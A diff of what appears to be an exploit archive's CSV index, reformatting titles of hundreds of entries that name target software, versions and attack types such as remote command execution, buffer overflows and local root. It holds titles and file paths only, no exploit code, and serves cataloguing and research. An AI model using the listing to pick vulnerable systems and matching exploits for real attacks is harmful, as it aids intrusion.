20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0 @@ -17773,8 +17773,8 @@ id,file,description,date,author,platform,type,port 20443,platforms/osx/local/20443.sh,"Tunnelblick - Local Root Exploit (2)",2012-08-11,zx2c4,osx,local,0 20444,platforms/cgi/remote/20444.txt,"Greg Matthews Classifieds.cgi 1.0 Metacharacter",1998-12-15,anonymous,cgi,remote,0 20445,platforms/windows/remote/20445.txt,"IIS 1.0_Netscape Server 1.0/1.12_OReilly WebSite Professional 1.1 b BAT/.CMD Remote Command Execution",1996-03-01,anonymous,windows,remote,0 -20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 wguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 -20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 rguest.exe Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20446,platforms/cgi/remote/20446.txt,"WebCom datakommunikation Guestbook 0.1 wguest.exe - Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 +20447,platforms/cgi/remote/20447.txt,"WebCom datakommunikation Guestbook 0.1 rguest.exe - Arbitrary File Access",1999-04-09,Mnemonix,cgi,remote,0 20448,platforms/cgi/remote/20448.txt,"Novell NetWare Web Server 2.x - convert.bas",1996-07-03,"TTT Group",cgi,remote,0 20449,platforms/unix/remote/20449.txt,"GlimpseHTTP 1.0/2.0 and WebGlimpse 1.0 Piped Command",1996-07-03,"Razvan Dragomirescu",unix,remote,0 20450,platforms/multiple/remote/20450.txt,"Trlinux Postaci Webmail 1.1.3 Password Disclosure",2000-11-30,"Michael R. Rudel",multiple,remote,0 @@ -17806,7 +17806,7 @@ id,file,description,date,author,platform,type,port 20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway CSRF",2012-08-13,"Nir Valtman",windows,webapps,0 20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 / Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,kingcope,linux,dos,0 -20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote,0 +20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 - Appended Dot Script Source Disclosure",1997-02-20,"Mark Joseph Edwards",windows,remote,0 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x - files.pl",1998-12-01,anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 websendmail Remote Command Execution",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow",1997-01-06,"Solar Designer",windows,dos,0 @@ -17830,7 +17830,7 @@ id,file,description,date,author,platform,type,port 20505,platforms/palm_os/local/20505.txt,"Secure Computing e.iD Authenticator for Palm 2.0 PIN Brute-Force",2000-12-14,@stake,palm_os,local,0 20506,platforms/cgi/remote/20506.html,"Leif M. Wright simplestguest.cgi 2.0 - Remote Command Execution",2000-12-14,suid,cgi,remote,0 20507,platforms/multiple/remote/20507.txt,"alex heiphetz group ezshopper 2.0/3.0 - Directory Traversal",2000-12-13,Nsfocus,multiple,remote,0 -20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 +20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP - Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 - 'aim://' Buffer Overflow",2000-12-12,"Joe Testa",windows,remote,0 20511,platforms/windows/remote/20511.txt,"AOL Instant Messenger 4.0/4.1.2010/4.2.1193 BuddyIcon Buffer Overflow",2000-12-12,@stake,windows,remote,0 @@ -17942,7 +17942,7 @@ id,file,description,date,author,platform,type,port 20619,platforms/linux/remote/20619.c,"Linuxconf 1.1.6 r10 - Remote Buffer Overflow",1999-12-21,R00T-X,linux,remote,0 20620,platforms/sco/remote/20620.c,"SCO UNIX 5 calserver Remote Buffer Overflow",1998-12-29,"Leshka Zakharoff",sco,remote,0 20621,platforms/unix/local/20621.txt,"Micro Focus Cobol 4.1 - Arbitrary Command Execution",2001-02-12,"Dixie Flatline",unix,local,0 -20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote Arbitrary Commands",2001-02-01,isno,linux,remote,0 +20622,platforms/linux/remote/20622.c,"Xmail 0.5/0.6 CTRLServer Remote - Arbitrary Commands",2001-02-01,isno,linux,remote,0 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal",2001-02-12,slipy,cgi,remote,0 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 - Font Parsing Code Execution",2012-08-20,Metasploit,windows,remote,0 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 - File Disclosure",2001-02-12,cuctema,multiple,remote,0 @@ -17951,8 +17951,8 @@ id,file,description,date,author,platform,type,port 20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal",2001-02-12,cuctema,windows,remote,0 20629,platforms/cgi/remote/20629.txt,"Way-Board 2.0 - File Disclosure",2001-02-12,cuctema,cgi,remote,0 20630,platforms/cgi/remote/20630.txt,"Martin Hamilton ROADS 2.3 - File Disclosure",2001-02-12,cuctema,cgi,remote,0 -20631,platforms/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 pals-cgi Traversal Arbitrary File Read",2001-02-02,cuctema,cgi,remote,0 -20632,platforms/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 pals-cgi Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote,0 +20631,platforms/cgi/remote/20631.txt,"PALS Library System WebPALS 1.0 pals-cgi Traversal - Arbitrary File Read",2001-02-02,cuctema,cgi,remote,0 +20632,platforms/cgi/remote/20632.txt,"PALS Library System WebPALS 1.0 pals-cgi - Arbitrary Command Execution",2001-02-02,cuctema,cgi,remote,0 20633,platforms/cgi/remote/20633.txt,"Brightstation Muscat 1.0 Root Path Disclosure",2001-02-12,cuctema,cgi,remote,0 20634,platforms/windows/dos/20634.txt,"John Roy Pi3Web 1.0.1 - Buffer Overflow",2001-02-15,joetesta,windows,dos,0 20635,platforms/multiple/remote/20635.txt,"caucho technology resin 1.2 - Directory Traversal",2001-02-16,joetesta,multiple,remote,0 @@ -17967,8 +17967,8 @@ id,file,description,date,author,platform,type,port 20645,platforms/linux/local/20645.c,"Elm 2.5.3 Alternative-Folder Buffer Overflow",2001-02-13,_kiss_,linux,local,0 20646,platforms/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 - Remote Buffer Overflow",2000-12-26,"Stan Bubrouski",unix,remote,0 20647,platforms/windows/remote/20647.c,"Atrium Software Mercur Mail Server 3.3 EXPN Buffer Overflow",2001-02-23,"Martin Rakhmanoff",windows,remote,0 -20648,platforms/solaris/remote/20648.c,"Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow",2001-03-15,"Last Stage of Delirium",solaris,remote,0 -20649,platforms/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 snmpXdmid Buffer Overflow (Metasploit)",2001-03-15,vlad902,solaris,remote,0 +20648,platforms/solaris/remote/20648.c,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow",2001-03-15,"Last Stage of Delirium",solaris,remote,0 +20649,platforms/solaris/remote/20649.pm,"Solaris 2.6/7.0/8 - snmpXdmid Buffer Overflow (Metasploit)",2001-03-15,vlad902,solaris,remote,0 20650,platforms/windows/dos/20650.txt,"Sapio WebReflex 1.55 GET Denial of Service",2001-02-27,slipy,windows,dos,0 20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal",2001-02-28,joetesta,windows,local,0 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 ILMI SNMP Community String",2001-02-27,pask,hardware,remote,0 @@ -17991,7 +17991,7 @@ id,file,description,date,author,platform,type,port 20669,platforms/php/webapps/20669.py,"GWebmail 0.7.3 - XSS / LFI / RCE",2012-08-20,"Shai rod",php,webapps,0 20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 20710,platforms/php/webapps/20710.html,"VamCart 0.9 - CSRF",2012-08-22,DaOne,php,webapps,0 -20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,Metasploit,cgi,webapps,0 +20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance - learn-msg.cgi Command Injection",2012-08-22,Metasploit,cgi,webapps,0 20671,platforms/php/webapps/20671.html,"PG Portal Pro CSRF",2012-08-20,Noxious,php,webapps,0 20672,platforms/php/webapps/20672.py,"Hivemail Webmail Multiple Stored XSS Vulnerabilities",2012-08-20,"Shai rod",php,webapps,0 20673,platforms/php/webapps/20673.txt,"YourArcadeScript 2.4 - (index.php id parameter) SQL Injection",2012-08-20,DaOne,php,webapps,0 @@ -18046,7 +18046,7 @@ id,file,description,date,author,platform,type,port 20735,platforms/sco/dos/20735.txt,"SCO OpenServer 5.0.6 lpadmin Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20736,platforms/sco/dos/20736.txt,"SCO Open Server 5.0.6 lpforms Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20737,platforms/sco/dos/20737.txt,"SCO Open Server 5.0.6 lpshut Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 -20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 ASCII Armor Parser Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0 +20738,platforms/multiple/remote/20738.txt,"PGP 5.x/6.x/7.0 ASCII Armor Parser - Arbitrary File Creation",2001-04-09,"Chris Anley",multiple,remote,0 20739,platforms/sco/dos/20739.txt,"SCO Open Server 5.0.6 lpusers Buffer Overflow",2001-03-27,"Secure Network Operations",sco,dos,0 20740,platforms/solaris/local/20740.c,"Solaris 7/8 kcms_configure Command-Line Buffer Overflow (1)",2001-04-09,"Riley Hassell",solaris,local,0 20741,platforms/solaris/local/20741.c,"Solaris 7/8 kcms_configure Command-Line Buffer Overflow (2)",2001-04-09,"Adam Slattery",solaris,local,0 @@ -18100,7 +18100,7 @@ id,file,description,date,author,platform,type,port 20793,platforms/windows/remote/20793.txt,"RobTex Viking Server 1.0.7 Relative Path Webroot Escaping",2001-04-23,joetesta,windows,remote,0 20794,platforms/windows/remote/20794.c,"WFTPD 3.0 - 'RETR' and 'CWD' Buffer Overflow",2001-04-22,"Len Budney",windows,remote,0 20795,platforms/linux/local/20795.sh,"Sendfile 1.x/2.1 - Local Privileged Arbitrary Command Execution",2001-04-24,psheep,linux,local,0 -20796,platforms/linux/remote/20796.rb,"Zabbix Server Arbitrary Command Execution",2012-08-27,Metasploit,linux,remote,0 +20796,platforms/linux/remote/20796.rb,"Zabbix Server - Arbitrary Command Execution",2012-08-27,Metasploit,linux,remote,0 20797,platforms/multiple/remote/20797.txt,"Perl Web Server 0.x - Path Traversal",2001-04-24,neme-dhc,multiple,remote,0 20798,platforms/linux/local/20798.sh,"Sendfile 1.x/2.1 - Forced Privilege Lowering Failure",2001-04-24,"Cade Cairns",linux,local,0 20799,platforms/cgi/remote/20799.c,"PowerScripts PlusMail WebConsole 1.0 Poor Authentication (1)",2000-01-11,"Synnergy Networks",cgi,remote,0 @@ -18152,7 +18152,7 @@ id,file,description,date,author,platform,type,port 20845,platforms/osx/dos/20845.txt,"Maxum Rumpus FTP Server 1.3.2/1.3.4/2.0.3 dev - Remote DoS",2001-05-15,"Jass Seljamaa",osx,dos,0 20846,platforms/windows/dos/20846.pl,"Microsoft IIS 4.0/5.0 FTP Denial of Service",2000-05-14,"Nelson Bunker",windows,dos,0 20847,platforms/hardware/dos/20847.c,"3Com OfficeConnect DSL Router 812 1.1.7/840 1.1.7 - HTTP Port Router DoS",2001-09-21,Sniffer,hardware,dos,0 -20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 URL Block Arbitrary File Disclosure",2001-04-15,"tobozo tagada",php,webapps,0 +20848,platforms/php/webapps/20848.txt,"PHPSlash 0.5.3 2/0.6.1 URL Block - Arbitrary File Disclosure",2001-04-15,"tobozo tagada",php,webapps,0 20849,platforms/cgi/remote/20849.pl,"DCForum 6.0 - Remote Admin Privilege Compromise",2001-05-08,"Franklin DeMatto",cgi,remote,0 20850,platforms/windows/remote/20850.txt,"Pacific Software Carello 1.2.1 Shopping Cart Command Execution",2001-05-14,"Peter Gründl",windows,remote,0 20851,platforms/sco/local/20851.txt,"SCO OpenServer 5.0.x - StartX Weak XHost Permissions",2001-05-07,"Richard Johnson",sco,local,0 @@ -18167,10 +18167,10 @@ id,file,description,date,author,platform,type,port 20862,platforms/php/webapps/20862.txt,"WordPress Count per Day Plugin 3.2.3 - XSS",2012-08-27,Crim3R,php,webapps,0 20863,platforms/php/webapps/20863.txt,"xt:Commerce VEYTON 4.0.15 - (products_name_de) Script Insertion",2012-08-27,LiquidWorm,php,webapps,0 20864,platforms/asp/webapps/20864.txt,"Elcom CMS 7.4.10 Community Manager Insecure File Upload",2012-08-27,"Sense of Security",asp,webapps,0 -20865,platforms/java/remote/20865.rb,"Java 7 Applet Remote Code Execution",2012-08-27,Metasploit,java,remote,0 +20865,platforms/java/remote/20865.rb,"Java 7 Applet - Remote Code Execution",2012-08-27,Metasploit,java,remote,0 20866,platforms/php/webapps/20866.txt,"aoop CMS 0.3.6 - Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 -20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client asagent.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 -20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 +20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client asagent.tmp - Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 +20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp - Arbitrary File Overwrite",2001-05-18,"Jonas Eriksson",linux,local,0 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 Script-filtering Bypass",2001-05-20,"eDvice Security Services",multiple,remote,0 20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow PoC",2012-08-28,LiquidWorm,windows,dos,0 20871,platforms/php/webapps/20871.txt,"CommPort 1.01 - Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 @@ -18290,8 +18290,8 @@ id,file,description,date,author,platform,type,port 20990,platforms/linux/local/20990.c,"teTeX 1.0.7 Filters Temporary File Race Condition",2001-06-22,zen-parse,linux,local,0 20991,platforms/windows/dos/20991.txt,"Microsoft IIS 4.0/5.0 Device File Remote DoS",2001-07-04,VIPER_SV,windows,dos,0 20992,platforms/linux/local/20992.c,"Lmail 2.7 Temporary File Race Condition",2001-07-04,"Charles Stevenson",linux,local,0 -20993,platforms/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM Session Cookie Guessing",2001-06-24,"ntf & sky",unix,remote,0 -20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD Arbitrary SMTP Relay",2001-07-04,"Andrea Barisani",linux,remote,0 +20993,platforms/unix/remote/20993.c,"XFree86 X11R6 3.3 XDM - Session Cookie Guessing",2001-06-24,"ntf & sky",unix,remote,0 +20994,platforms/linux/remote/20994.txt,"Cobalt Raq3 PopRelayD - Arbitrary SMTP Relay",2001-07-04,"Andrea Barisani",linux,remote,0 20995,platforms/php/webapps/20995.txt,"cobalt qube webmail 1.0 - Directory Traversal",2001-07-05,kf,php,webapps,0 20996,platforms/php/webapps/20996.txt,"Basilix Webmail 1.0 - File Disclosure",2001-07-06,"karol _",php,webapps,0 20997,platforms/multiple/dos/20997.c,"HP-UX 11_Linux Kernel 2.4_Windows 2000/NT 4.0_IRIX 6.5 - Small TCP MSS DoS",2001-07-07,"Darren Reed",multiple,dos,0 @@ -18335,11 +18335,11 @@ id,file,description,date,author,platform,type,port 21039,platforms/windows/remote/21039.pl,"SimpleServer:WWW 1.0.7/1.0.8/1.13 Hex Encoded URL Directory Traversal",2001-07-26,THRAN,windows,remote,0 21040,platforms/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",windows,dos,0 21042,platforms/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 Possible Buffer Overflow",2001-07-29,Coolest,multiple,dos,0 -21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local,0 +21043,platforms/linux/local/21043.c,"GNU findutils 4.0/4.1 Locate - Arbitrary Command Execution",2001-08-01,"Josh Smith",linux,local,0 21044,platforms/windows/local/21044.c,"Oracle 8/9i DBSNMP Oracle Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",windows,local,0 21045,platforms/unix/local/21045.c,"Oracle OTRCREP Oracle 8/9 Home Environment Variable Buffer Overflow",2001-08-02,"Juan Manuel Pascual Escribá",unix,local,0 21046,platforms/php/webapps/21046.txt,"phpBB 1.4 - SQL Query Manipulation",2001-08-03,kill-9,php,webapps,0 -21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 NT4ALL DoS",2001-08-03,hypoclear,windows,dos,0 +21047,platforms/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL DoS",2001-08-03,hypoclear,windows,dos,0 21048,platforms/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - DoS",1999-04-09,Epic,cgi,dos,0 21049,platforms/linux/remote/21049.c,"NCSA httpd 1.x - Buffer Overflow (1)",1997-04-23,savage,linux,remote,0 21050,platforms/linux/remote/21050.c,"NCSA httpd 1.x - Buffer Overflow (2)",1995-02-17,Xtremist,linux,remote,0 @@ -18351,10 +18351,10 @@ id,file,description,date,author,platform,type,port 21057,platforms/windows/remote/21057.txt,"Microsoft IIS 4/5/6 Internal IP Address/Internal Network Name Disclosure",2001-08-08,"Marek Roy",windows,remote,0 21058,platforms/solaris/local/21058.c,"Solaris 2.6/7/8 SPARC xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 21059,platforms/solaris/local/21059.c,"Solaris 8 x86 xlock Heap Overflow",2001-08-10,Nsfocus,solaris,local,0 -21060,platforms/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger Arbitrary Code Execution (1)",2001-08-17,grange,linux,local,0 -21061,platforms/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local,0 -21062,platforms/linux/local/21062.txt,"Sendmail 8.11/8.12 Debugger Arbitrary Code Execution (3)",2001-08-17,"Lucian Hudin",linux,local,0 -21063,platforms/linux/local/21063.txt,"Sendmail 8.11/8.12 Debugger Arbitrary Code Execution (4)",2001-08-17,"RoMaN SoFt",linux,local,0 +21060,platforms/linux/local/21060.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (1)",2001-08-17,grange,linux,local,0 +21061,platforms/linux/local/21061.c,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (2)",2001-08-17,sd@sf.cz,linux,local,0 +21062,platforms/linux/local/21062.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (3)",2001-08-17,"Lucian Hudin",linux,local,0 +21063,platforms/linux/local/21063.txt,"Sendmail 8.11/8.12 Debugger - Arbitrary Code Execution (4)",2001-08-17,"RoMaN SoFt",linux,local,0 21064,platforms/unix/remote/21064.c,"Fetchmail 5.x - POP3 Reply Signed Integer Index",2001-08-09,"Salvatore Sanfilippo -antirez-",unix,remote,0 21065,platforms/php/webapps/21065.pl,"phpBB 1.x - Page Header Remote Arbitrary Command Execution",2001-07-31,UnderSpell,php,webapps,0 21066,platforms/unix/remote/21066.c,"Fetchmail 5.x - IMAP Reply Signed Integer Index",2001-08-09,"Sanfillipo antirez",unix,remote,0 @@ -18366,7 +18366,7 @@ id,file,description,date,author,platform,type,port 21072,platforms/windows/local/21072.txt,"Microsoft IIS 5.0 - In-Process Table Privilege Elevation",2001-08-15,"Digital Offense",windows,local,0 21073,platforms/unix/local/21073.txt,"Jakarta Tomcat 3.x/4.0 - Error Message Information Disclosure",2001-08-16,LoWNOISE,unix,local,0 21074,platforms/unix/dos/21074.pl,"glFTPD 1.x - LIST Denial of Service",2001-08-17,"ASGUARD LABS",unix,dos,0 -21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus ",linux,remote,0 +21075,platforms/linux/remote/21075.txt,"SuSE 6.3/6.4/7.0 sdb - Arbitrary Command Execution",2001-08-02,"Maurycy Prodeus ",linux,remote,0 21076,platforms/osx/local/21076.txt,"Intego FileGuard 2.0/4.0 Weak Password Encryption",2001-08-20,MacSec,osx,local,0 21077,platforms/bsd/dos/21077.c,"BSDI 3.0/3.1 - Possible Local Kernel Denial of Service",2001-08-21,V9,bsd,dos,0 21078,platforms/multiple/local/21078.txt,"Respondus for WebCT 1.1.2 Weak Password Encryption",2001-08-23,"Desmond Irvine",multiple,local,0 @@ -18382,8 +18382,8 @@ id,file,description,date,author,platform,type,port 21090,platforms/windows/local/21090.txt,"CuteFTP 4.2 - Default Weak Password Encoding",2001-08-23,"E. van Elk",windows,local,0 21091,platforms/windows/local/21091.txt,"UltraEdit 8.2 FTP Client Weak Password Encryption",2001-08-23,"E. van Elk",windows,local,0 21092,platforms/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service",2001-08-23,"Cisco Security",hardware,dos,0 -21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 -21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 piomkapqd Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local,0 +21093,platforms/aix/remote/21093.c,"AIX 4.1/4.2 - pdnsd Buffer Overflow",1999-08-17,"Last Stage of Delirium",aix,remote,0 +21094,platforms/aix/local/21094.c,"AIX 4.2/4.3 - piomkapqd Buffer Overflow",2000-09-01,"Last Stage of Delirium",aix,local,0 21095,platforms/linux/remote/21095.txt,"RedHat 6.2/7.0/7.1 Lpd Remote Command Execution via DVI Printfilter Configuration Error",2001-08-27,"zenith parsec",linux,remote,0 21096,platforms/windows/local/21096.txt,"Outlook Express 6 Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0 21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd Remote Command Execution",2001-08-31,ron1n,solaris,remote,0 @@ -18417,14 +18417,14 @@ id,file,description,date,author,platform,type,port 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 21127,platforms/windows/remote/21127.txt,"Microsoft Internet Explorer 5/6 JavaScript Interface Spoofing",2001-10-21,"Georgi Guninski",windows,remote,0 21128,platforms/unix/remote/21128.c,"NSI Rwhoisd 1.5 - Remote Format String",2001-04-17,CowPower,unix,remote,0 -21129,platforms/cgi/remote/21129.java,"iBill Management Script Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0 +21129,platforms/cgi/remote/21129.java,"iBill Management Script - Weak Hard-Coded Password",2001-10-25,"MK Ultra",cgi,remote,0 21130,platforms/windows/local/21130.c,"Microsoft Windows NT 3/4 CSRSS Memory Access Violation",2001-10-26,"Michael Wojcik",windows,local,0 21131,platforms/windows/dos/21131.txt,"Microsoft Windows 2000/XP GDI Denial of Service",2001-10-29,PeterB,windows,dos,0 21132,platforms/php/webapps/21132.txt,"Cannonbolt Portfolio Manager 1.0 - Multiple Vulnerabilities",2012-09-07,LiquidWorm,php,webapps,0 21133,platforms/php/webapps/21133.txt,"Clipster Video Persistent XSS",2012-09-07,DaOne,php,webapps,0 21134,platforms/hardware/webapps/21134.txt,"Sitecom Home Storage Center Auth Bypass",2012-09-07,"Mattijs van Ommeren",hardware,webapps,0 21135,platforms/php/webapps/21135.txt,"TestLink 1.9.3 - CSRF",2012-09-07,"High-Tech Bridge SA",php,webapps,0 -21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 SSH Default Password Security Bypass",2012-08-30,Metasploit,linux,remote,0 +21136,platforms/linux/remote/21136.rb,"Symantec Messaging Gateway 9.5/9.5.1 - SSH Default Password Security Bypass",2012-08-30,Metasploit,linux,remote,0 21137,platforms/multiple/remote/21137.rb,"HP SiteScope - Remote Code Execution (1)",2012-09-08,Metasploit,multiple,remote,0 21138,platforms/php/remote/21138.rb,"Sflog! CMS 1.0 - Arbitrary File Upload",2012-09-08,Metasploit,php,remote,0 21139,platforms/windows/local/21139.rb,"ActiveFax (ActFax) 4.3 - Client Importer Buffer Overflow",2012-09-08,Metasploit,windows,local,0 @@ -18469,10 +18469,10 @@ id,file,description,date,author,platform,type,port 21181,platforms/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0_Mozilla 0.9.6_Opera 5.1 Image Count Denial of Service",2001-12-11,"Pavel Titov",multiple,dos,0 21182,platforms/novell/remote/21182.txt,"Novell Groupwise 5.5/6.0 Servlet Gateway Default Authentication",2001-12-15,"Adam Gray",novell,remote,0 21183,platforms/cgi/remote/21183.txt,"webmin 0.91 - Directory Traversal",2001-12-17,"A. Ramos",cgi,remote,0 -21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 Debug Mode Cross-Site Scripting",2001-12-17,"Tamer Sahin",cgi,webapps,0 +21184,platforms/cgi/webapps/21184.txt,"Agora.CGI 3.x/4.0 - Debug Mode Cross-Site Scripting",2001-12-17,"Tamer Sahin",cgi,webapps,0 21185,platforms/unix/remote/21185.sh,"QPopper 4.0.x - PopAuth Trace File Shell Command Execution",2001-12-18,IhaQueR,unix,remote,0 21186,platforms/hardware/remote/21186.txt,"ZyXEL Prestige 681 SDSL Router - IP Fragment Reassembly",2001-12-18,"Przemyslaw Frasunek",hardware,remote,0 -21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps,0 +21187,platforms/cgi/webapps/21187.txt,"Aktivate 1.0 3 - Shopping Cart Cross-Site Scripting",2001-12-18,"Tamer Sahin",cgi,webapps,0 21188,platforms/windows/remote/21188.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow (1)",2001-12-20,"Gabriel Maggiotti",windows,remote,0 21189,platforms/windows/remote/21189.c,"Windows 98/XP/ME UPnP NOTIFY Buffer Overflow (2)",2001-12-20,JOCANOR,windows,remote,0 21190,platforms/linux/remote/21190.rb,"WAN Emulator 2.3 - Command Execution",2012-09-10,Metasploit,linux,remote,0 @@ -18488,7 +18488,7 @@ id,file,description,date,author,platform,type,port 21521,platforms/php/webapps/21521.txt,"ViArt Shop Enterprise 4.1 - Arbitrary Command Execution",2012-09-25,LiquidWorm,php,webapps,0 21200,platforms/linux/remote/21200.c,"Net-SNMP 4.2.3 snmpnetstat Remote Heap Overflow",2002-01-03,"Juan M. de la Torre",linux,remote,0 21201,platforms/windows/remote/21201.pl,"BrowseFTP Client 1.62 - Buffer Overflow",2002-01-04,Kanatoko,windows,remote,0 -21202,platforms/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script Engine File Opening Denial of Service",2002-01-04,methodic,linux,dos,0 +21202,platforms/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,linux,dos,0 21203,platforms/windows/remote/21203.txt,"Lucent 8.x - VitalNet Password Authentication Bypass",2002-01-16,"Mark Cooper",windows,remote,0 21204,platforms/windows/remote/21204.txt,"Apache 1.3.20 - Win32 PHP.EXE Remote File Disclosure",2002-01-04,"Paul Brereton",windows,remote,0 21205,platforms/linux/remote/21205.c,"Boozt 0.9.8 - Buffer Overflow",2002-01-07,"Rafael San Miguel Carrasco",linux,remote,0 @@ -18498,7 +18498,7 @@ id,file,description,date,author,platform,type,port 21209,platforms/cgi/webapps/21209.txt,"Ultimate Bulletin Board 5.4/6.0/6.2 - Cross-Agent Scripting",2002-01-09,Obscure,cgi,webapps,0 21210,platforms/linux/remote/21210.txt,"X-Chat 1.x - CTCP Ping Arbitrary Remote IRC Command Execution",2002-01-09,"Marcus Meissner",linux,remote,0 21211,platforms/windows/remote/21211.txt,"EServ 2.9x Password-Protected File Access",2002-01-10,"Tamer Sahin",windows,remote,0 -21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0 